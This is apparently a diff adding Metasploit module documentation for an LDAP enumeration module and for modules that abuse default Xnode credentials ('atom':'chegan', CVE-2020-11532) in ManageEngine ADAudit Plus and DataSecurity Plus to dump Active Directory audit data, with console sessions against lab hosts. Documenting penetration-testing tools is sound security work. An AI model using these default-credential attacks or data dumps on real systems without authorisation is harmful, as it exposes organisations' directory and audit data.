+The output format to use. Can be either `csv`, `table` or `json` for
+CSV, Rex table output, or JSON output respectively.
+
+### BASE_DN
+The LDAP base DN if already obtained. If not supplied, the module will
+automatically attempt to find the base DN for the target LDAP server.
+
+### QUERY_FILE_PATH
+If the `ACTION` is set to `RUN_QUERY_FILE`, then this option is required and
+must be set to the full path to the JSON or YAML file containing the queries to
+be run.
+
+The file format must follow the following convention:
+
+```
+queries:
+  - action: THE ACTION NAME
+    description: "THE ACTION DESCRIPTION"
+    filter: "THE LDAP FILTER"
+    attributes:
+      - dn
+      - displayName
+      - name
+      - description
+```
+
+Where `queries` is an array of queries to be run, each containing an `action` field
+containing the name of the action to be run, a `description` field describing the
+action, a `filter` field containing the filter to send to the LDAP server
+(aka what to search on), and the list of attributes that we are interested in from
+the results as an array.
+
+### QUERY_FILTER
+Used only when the `RUN_SINGLE_QUERY` action is used. This should be set to the filter
+aka query that you want to send to the target LDAP server.
+
+### QUERY_ATTRIBUTES
+Used only when the `RUN_SINGLE_QUERY` action is used. Should be a comma separated list
+of attributes to display from the full result set for each entry that was returned by the
+target LDAP server. Used to filter the results down to manageable sets of data.
+
+## Scenarios
+
+### RUN_SINGLE_QUERY with Table Output
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.27.51.83
+RHOSTS => 172.27.51.83
+msf6 auxiliary(gather/ldap_query) > set ACTION RUN_SINGLE_QUERY
+ACTION => RUN_SINGLE_QUERY
+msf6 auxiliary(gather/ldap_query) > set QUERY_ATTRIBUTES dn,displayName,name
+QUERY_ATTRIBUTES => dn,displayName,name
+msf6 auxiliary(gather/ldap_query) > set QUERY_FILTER (objectClass=*)
+QUERY_FILTER => (objectClass=*)
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.27.51.83
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.27.51.83:389 Discovered base DN: DC=daforest,DC=com
+[*] Sending single query (objectClass=*) to the LDAP server...
+[*] DC=daforest DC=com
+==================
+
+ Name  Attributes
+ ----  ----------
+ name  daforest
+
+[*] CN=Users DC=daforest DC=com
+===========================
+
+ Name  Attributes
+ ----  ----------
+ name  Users
+
+[*] CN=Computers DC=daforest DC=com
+===============================
+
+ Name  Attributes
+ ----  ----------
+ name  Computers
+
+*cut for brevity*
+
+[*] CN=WAPPS1000022 OU=TST OU=Tier 1 DC=daforest DC=com
+===================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WAPPS1000022
+ name         WAPPS1000022
+
+[*] CN=WLPT1000014 OU=AZR OU=Stage DC=daforest DC=com
+=================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WLPT1000014
+ name         WLPT1000014
+
+[*] CN=WWKS1000016 OU=T1-Roles OU=Tier 1 OU=Admin DC=daforest DC=com
+================================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WWKS1000016
+ name         WWKS1000016
+
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+==========================================================
+
+ Name         Attributes
+ ----         ----------
+ displayname  WVIR1000013
+ name         WVIR1000013
+ 
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### RUN_QUERY_FILE with Table Output
+
+Here is the sample query file we will be using:
+
+```
+$ cat test.yaml
+---
+queries:
+  - action: ENUM_USERS
+    description: "Enumerate users"
+    filter: "(|(objectClass=inetOrgPerson)(objectClass=user)(sAMAccountType=805306368)(objectClass=posixAccount))"
+    columns:
+      - dn
+      - displayName
+      - name
+      - description
+  - action: ENUM_ORGUNITS
+    description: "Enumerate organizational units"
+    filter: "(objectClass=organizationalUnit)"
+    columns:
+      - dn
+      - displayName
+      - name
+      - description
+  - action: ENUM_GROUPS
+    description: "Enumerate groups"
+    filter: "(|(objectClass=group)(objectClass=groupOfNames)(groupType:1.2.840.113556.1.4.803:=2147483648)(objectClass=posixGroup))"
+    columns:
+      - dn
+      - name
+      - groupType
+      - memberof
+```
+
+Here is the results of using this file with the `RUN_QUERY_FILE` action which will
+run all queries within the file one after another.
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.27.51.83
+RHOSTS => 172.27.51.83
+msf6 auxiliary(gather/ldap_query) > set ACTION RUN_QUERY_FILE 
+ACTION => RUN_QUERY_FILE
+msf6 auxiliary(gather/ldap_query) > set QUERY_FILE_PATH /home/gwillcox/git/metasploit-framework/test.yaml
+QUERY_FILE_PATH => /home/gwillcox/git/metasploit-framework/test.yaml
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name             Current Setting                     Required  Description
+   ----             ---------------                     --------  -----------
+   BASE_DN                                              no        LDAP base DN if you already have it
+   BIND_DN          normal@daforest.com                 no        The username to authenticate to LDAP server
+   BIND_PW          thePassword123                      no        Password for the BIND_DN
+   OUTPUT_FORMAT    table                               yes       The output format to use (Accepted: csv, table, json)
+   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-fram  no        Path to the JSON or YAML file to load and run queries from
+                    ework/test.yaml
+   RHOSTS           172.27.51.83                        yes       The target host(s), see https://github.com/rapid7/metasploit-f
+                                                                  ramework/wiki/Using-Metasploit
+   RPORT            389                                 yes       The target port
+   SSL              false                               no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   RUN_QUERY_FILE  Execute a custom set of LDAP queries from the JSON or YAML file specified by QUERY_FILE.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.27.51.83
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.27.51.83:389 Discovered base DN: DC=daforest,DC=com
+[*] Loading queries from /home/gwillcox/git/metasploit-framework/test.yaml...
+[*] Running ENUM_USERS...
+[*] CN=Administrator CN=Users DC=daforest DC=com
+============================================
+
+ Name         Attributes
+ ----         ----------
+ description  Built-in account for administering the computer/domain
+ name         Administrator
+
+[*] CN=Guest CN=Users DC=daforest DC=com
+====================================
+
+ Name         Attributes
+ ----         ----------
+ description  Built-in account for guest access to the computer/domain
+ name         Guest
+
+*cut for brevity*
+
+[*] Running ENUM_ORGUNITS...
+[*] OU=Domain Controllers DC=daforest DC=com
+========================================
+
+ Name         Attributes
+ ----         ----------
+ description  Default container for domain controllers
+ name         Domain Controllers
+
+[*] OU=Admin DC=daforest DC=com
+===========================
+
+ Name  Attributes
+ ----  ----------
+ name  Admin
+
+[*] OU=Tier 0 OU=Admin DC=daforest DC=com
+=====================================
+
+ Name  Attributes
+ ----  ----------
+ name  Tier 0
+
+*cut for brevity*
+
+[*] Running ENUM_GROUPS...
+[*] CN=Administrators CN=Builtin DC=daforest DC=com
+===============================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Administrators
+
+[*] CN=Users CN=Builtin DC=daforest DC=com
+======================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Users
+
+[*] CN=Guests CN=Builtin DC=daforest DC=com
+=======================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Guests
+
+[*] CN=Print Operators CN=Builtin DC=daforest DC=com
+================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Print Operators
+
+[*] CN=Backup Operators CN=Builtin DC=daforest DC=com
+=================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483643
+ name       Backup Operators
+ 
+*cut for brevity*
+
+[*] CN=EL-chu-distlist1 OU=T2-Roles OU=Tier 2 OU=Admin DC=daforest DC=com
+=====================================================================
+
+ Name       Attributes
+ ----       ----------
+ grouptype  -2147483646
+ name       EL-chu-distlist1
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with Table Output
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   BASE_DN                         no        LDAP base DN if you already have it
+   BIND_DN                         no        The username to authenticate to LDAP server
+   BIND_PW                         no        Password for the BIND_DN
+   OUTPUT_FORMAT  table            yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
+                                             etasploit
+   RPORT          389              yes       The target port
+   SSL            false            no        Enable SSL on the LDAP connection
+
+msf6 auxiliary(gather/ldap_query) > set ACTION 
+set ACTION ENUM_ACCOUNTS             set ACTION ENUM_DOMAIN_CONTROLLERS   set ACTION ENUM_ORGROLES
+set ACTION ENUM_ALL_OBJECT_CATEGORY  set ACTION ENUM_EXCHANGE_RECIPIENTS  set ACTION ENUM_ORGUNITS
+set ACTION ENUM_ALL_OBJECT_CLASS     set ACTION ENUM_EXCHANGE_SERVERS     set ACTION RUN_QUERY_FILE
+set ACTION ENUM_COMPUTERS            set ACTION ENUM_GROUPS               
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] CN=WIN-F7DQC9SR0HD OU=Domain Controllers DC=daforest DC=com
+===========================================================
+
+ Name                    Attributes
+ ----                    ----------
+ distinguishedname       CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com
+ dnshostname             WIN-F7DQC9SR0HD.daforest.com
+ name                    WIN-F7DQC9SR0HD
+ operatingsystemversion  10.0 (20348)
+
+[*] CN=FSRWLPT1000000 OU=Testing DC=daforest DC=com
+===============================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        FSRWLPT1000000
+ distinguishedname  CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com
+ name               FSRWLPT1000000
+
+[*] CN=TSTWVIR1000000 OU=FSR OU=People DC=daforest DC=com
+=====================================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        TSTWVIR1000000
+ distinguishedname  CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com
+ name               TSTWVIR1000000
+
+*cut for brevity*
+
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+==========================================================
+
+ Name               Attributes
+ ----               ----------
+ description        Created with secframe.com/badblood.
+ displayname        WVIR1000013
+ distinguishedname  CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com
+ name               WVIR1000013
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with CSV Output
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query             
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set OUTPUT_FORMAT csv 
+OUTPUT_FORMAT => csv
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   BIND_DN        normal@daforest.com  no        The username to authenticate to LDAP server
+   BIND_PW        thePassword123       no        Password for the BIND_DN
+   OUTPUT_FORMAT  csv                  yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS         172.20.161.209       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
+                                                 ng-Metasploit
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   ENUM_COMPUTERS  Dump all objects containing an objectCategory of Computer.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] Name,Attributes
+"dn","CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com"
+"distinguishedname","CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com"
+"name","WIN-F7DQC9SR0HD"
+"operatingsystemversion","10.0 (20348)"
+"dnshostname","WIN-F7DQC9SR0HD.daforest.com"
+
+[*] Name,Attributes
+"dn","CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com"
+"displayname","FSRWLPT1000000"
+"name","FSRWLPT1000000"
+
+[*] Name,Attributes
+"dn","CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com"
+"displayname","TSTWVIR1000000"
+"name","TSTWVIR1000000"
+
+*cut for brevity*
+
+[*] Name,Attributes
+"dn","CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com"
+"displayname","WVIR1000013"
+"name","WVIR1000013"
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with JSON Output
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query             
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set OUTPUT_FORMAT json 
+OUTPUT_FORMAT => json
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   BIND_DN        normal@daforest.com  no        The username to authenticate to LDAP server
+   BIND_PW        thePassword123       no        Password for the BIND_DN
+   OUTPUT_FORMAT  json                 yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS         172.20.161.209       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
+                                                 ng-Metasploit
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   ENUM_COMPUTERS  Dump all objects containing an objectCategory of Computer.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] CN=WIN-F7DQC9SR0HD OU=Domain Controllers DC=daforest DC=com
+{
+  "dn": "CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com",
+  "distinguishedname": "CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com",
+  "name": "WIN-F7DQC9SR0HD",
+  "operatingsystemversion": "10.0 (20348)",
+  "dnshostname": "WIN-F7DQC9SR0HD.daforest.com"
+}
+[*] CN=FSRWLPT1000000 OU=Testing DC=daforest DC=com
+{
+  "dn": "CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com",
+  "displayname": "FSRWLPT1000000",
+  "name": "FSRWLPT1000000"
+}
+[*] CN=TSTWVIR1000000 OU=FSR OU=People DC=daforest DC=com
+{
+  "dn": "CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com",
+  "displayname": "TSTWVIR1000000",
+  "name": "TSTWVIR1000000"
+}
+*cut for brevity*
+[*] CN=WLPT1000014 OU=AZR OU=Stage DC=daforest DC=com
+{
+  "dn": "CN=WLPT1000014,OU=AZR,OU=Stage,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WLPT1000014,OU=AZR,OU=Stage,DC=daforest,DC=com",
+  "displayname": "WLPT1000014",
+  "name": "WLPT1000014"
+}
+[*] CN=WWKS1000016 OU=T1-Roles OU=Tier 1 OU=Admin DC=daforest DC=com
+{
+  "dn": "CN=WWKS1000016,OU=T1-Roles,OU=Tier 1,OU=Admin,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WWKS1000016,OU=T1-Roles,OU=Tier 1,OU=Admin,DC=daforest,DC=com",
+  "displayname": "WWKS1000016",
+  "name": "WWKS1000016"
+}
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+{
+  "dn": "CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com",
+  "displayname": "WVIR1000013",
+  "name": "WVIR1000013"
+}
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
@@ -0,0 +1,156 @@
+## Vulnerable Application
+The module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 (6032)
+in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information
+including domain names, host names, usernames and SIDs. The module can also be used against patched ADAudit Plus
+versions if the correct credentials are provided.
+
+The module's `check` method attempts to authenticate to the remote Xnode server. The default credentials are `atom`:`chegan`.
+If the credentials are valid, the module will perform a few requests to the Xnode server to obtain information like the Xnode version.
+This is mostly done as a sanity check to ensure the Xnode server is working as expected.
+
+Next, the module will iterate over a list of known Xnode data repositories and perform several requests for each in order to:
+- Check if the data repository is configured on the target
+- Obtain the total number of records in the data repository
+- Obtain both the lowest and the highest value for the ID field (column). These values will be used
+to determine the range of possible records to be queried.
+
+If a given data repository exists, the module uses the above information to dump the data repository contents.
+The maximum number of records returned for a search query is 10. To overcome this, the module performs series of requests
+using the `dr:/dr_search` action, while specifying the ID values for each record.
+For example, if the lowest observed ID value is 15 and the highest is 41, the module will perform three requests:
+1. A request for the records with ID values 15 to 24
+2. A request for the records with ID values 25 to 34
+3. A request for the records with ID values 35 to 41
+Empty records are ignored.
+
+To view the raw Xnode requests and responses, enter `set VERBOSE true` before running the module.
+
+By default, the module dumps only the data repositories (tables) and fields (columns) specified in the configuration file.
+The configuration file can be set via the `CONFIG_FILE` option, but this is not required because
+a default config file exists at `data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml` that will
+be used if `CONFIG_FILE` is not set.
+
+The configuration file is also used to add labels to the values sent by Xnode in response to a query.
+This means that for every value in the Xnode response, the module will add the corresponding field name to the results
+before writing those to a JSON file in `~/.msf4/loot`.
+
+It is also possible to use the `DUMP_ALL` option to obtain all data in all known data repositories without specifying data field names.
+However, note that when using this option the data won't be labeled.
+
+This module has been successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2
+and ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.
+
+## Installation Information
+Vulnerable versions of ADAudit Plus are available [here](https://archives2.manageengine.com/active-directory-audit/).
+All versions from 6000 through 6031 are configured with default Xnode credentials. Note that testing against
+vulnerable versions from the archives will make data enumeration impossible because the free trials for those
+versions do not seem to allow ADAudit Plus to actually start collecting data that can then be accessed via Xnode.
+
+However, apart from some configuration changes, Xnode functions the same way on patched versions as it does on vulnerable versions,
+so it is possible to test the modules against patched versions as long as the correct credentials are provided.
+
+A free 30-day trial of the latest version of ADAudit Plus can be downloaded
+[here](https://www.manageengine.com/products/active-directory-audit/download.html). To install, just run the .exe and follow the instructions.
+
+In order to configure a patched ManageEngine ADAudit Plus instance for testing, follow these steps:
+- Open the Xnode config file at `<install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf`
+- Note down the username and password
+- Insert the following line:
+```
+xnode.connector.accept_remote_request = true
+```
+To launch ADAudit Plus, run Command Prompt as administrator and run: `<install_dir>\bin\run.bat`
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/manageengine_adaudit_plus_xnode_enum`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Options
+### CONFIG_FILE
+YAML File specifying the data repositories (tables) and fields (columns) to dump.
+
+### DUMP_ALL
+Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+
+## Scenarios
+### ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2
+```
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options
+
+Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
+
+   Name         Current Setting                                                Required  Description
+   ----         ---------------                                                --------  -----------
+   CONFIG_FILE  /home/wynter/dev/metasploit-framework/data/exploits/manageeng  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml
+   DUMP_ALL     false                                                          no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     chegan                                                         yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.41                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29118                                                          yes       The target port (TCP)
+   USERNAME     atom                                                           yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
+[*] Running module against 192.168.1.41
+
+[*] 192.168.1.41:29118 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.1.41:29118 - Target seems to be Xnode.
+[+] 192.168.1.41:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.41:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.41:29118 - Target is running Xnode version: "XNODE_1_0_0".
+[*] 192.168.1.41:29118 - Obtained Xnode installation path: "C:\Program Files (x86)\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
+[*] 192.168.1.41:29118 - Data repository AdapFileAuditLog is empty.
+[*] 192.168.1.41:29118 - The data repository AdapPowershellAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapSysMonAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapDNSAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapADReplicationAuditLog is not available on the target.
+[*] Auxiliary module execution completed
+```
+
+### ManageEngine ADAudit Plus 6.0.7 (6076) running on Windows Server 2019 (custom password)
+```
+msf6 > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set rhosts 192.168.1.25
+rhosts => 192.168.1.25
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set password custom_password
+password => custom_password
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options 
+
+Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
+
+   Name         Current Setting                                                                                                 Required  Description
+   ----         ---------------                                                                                                 --------  -----------
+   CONFIG_FILE  /root/github/manageengine/metasploit-framework/data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xn  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ode_conf.yaml
+   DUMP_ALL     false                                                                                                           no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     custom_password                                                                                                 yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.25                                                                                                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29118                                                                                                           yes       The target port (TCP)
+   USERNAME     atom                                                                                                            yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
+
+[*] Running module against 192.168.1.25
+
+[*] 192.168.1.25:29118 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.1.25:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.25:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.25:29118 - Target is running Xnode version: "DataEngine-XNode 1.1.0 (1100)".
+[*] 192.168.1.25:29118 - Obtained Xnode installation path: "C:\Program Files\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
+[*] 192.168.1.25:29118 - Data repository AdapFileAuditLog is empty.
+[+] 192.168.1.25:29118 - Data repository AdapPowershellAuditLog contains 261 records with ID numbers between 1.0 and 303.0.
+[*] 192.168.1.25:29118 - Data repository AdapSysMonAuditLog is empty.
+[+] 192.168.1.25:29118 - Data repository AdapDNSAuditLog contains 722 records with ID numbers between 1.0 and 926.0.
+[*] 192.168.1.25:29118 - Data repository AdapADReplicationAuditLog is empty.
+[*] 192.168.1.25:29118 - Attempting to request 261 records for data repository AdapPowershellAuditLog between IDs 1 and 303. This could take a while...
+[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 303...
+[+] 192.168.1.25:29118 - Saving 261 records from the AdapPowershellAuditLog data repository to /root/.msf4/loot/20220610073738_default_192.168.1.25_xnode_powershell_099421.json
+[*] 192.168.1.25:29118 - Attempting to request 722 records for data repository AdapDNSAuditLog between IDs 1 and 926. This could take a while...
+[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 926...
+[*] 192.168.1.25:29118 - Processed 50 queries (max 10 records per query) so far. The last queried record ID was 500. The max ID is 926...
+[*] 192.168.1.25:29118 - Processed 75 queries (max 10 records per query) so far. The last queried record ID was 750. The max ID is 926...
+[+] 192.168.1.25:29118 - Saving 722 records from the AdapDNSAuditLog data repository to /root/.msf4/loot/20220610073754_default_192.168.1.25_xnode_dnsaudit_775121.json
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) >
+```
@@ -0,0 +1,114 @@
+## Vulnerable Application
+The module exploits default admin credentials for the DataEngine Xnode server in DataSecurity Plus versions prior to 6.0.1 (6011)
+in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information
+including domain names, host names, usernames and SIDs. The module can also be used against patched 
+DataSecurity Plus versions if the correct credentials are provided.
+
+The module's `check` method attempts to authenticate to the remote Xnode server. The default credentials are `atom`:`chegan`.
+If the credentials are valid, the module will perform a few requests to the Xnode server to obtain information like the Xnode version.
+This is mostly done as a sanity check to ensure the Xnode server is working as expected.
+
+Next, the module will iterate over a list of known Xnode data repositories and perform several requests for each in order to:
+- Check if the data repository is configured on the target
+- Obtain the total number of records in the data repository
+- Obtain both the lowest and the highest value for the ID field (column). These values will be used
+to determine the range of possible records to be queried.
+
+If a given data repository exists, the module uses the above information to dump the data repository contents.
+The maximum number of records returned for a search query is 10. To overcome this, the module performs series of requests
+using the `dr:/dr_search` action, while specifying the ID values for each record.
+For example, if the lowest observed ID value is 15 and the highest is 41, the module will perform three requests:
+1. A request for the records with ID values 15 to 24
+2. A request for the records with ID values 25 to 34
+3. A request for the records with ID values 35 to 41
+Empty records are ignored.
+
+To view the raw Xnode requests and responses, enter `set VERBOSE true` before running the module.
+
+By default, the module dumps only the data repositories (tables) and fields (columns) specified in the configuration file.
+The configuration file can be set via the `CONFIG_FILE` option, but this is not required because
+a default config file exists at `data/exploits/manageengine_xnode/CVE-2020-11532/datasecurity_plus_xnode_conf.yaml`
+that will be used if `CONFIG_FILE` is not set.
+
+The configuration file is then also used to add labels to the values sent by Xnode in response to a query.
+This means that for every value in the Xnode response, the module will add the corresponding field name to the results
+before writing those to a JSON file in `~/.msf4/loot`.
+
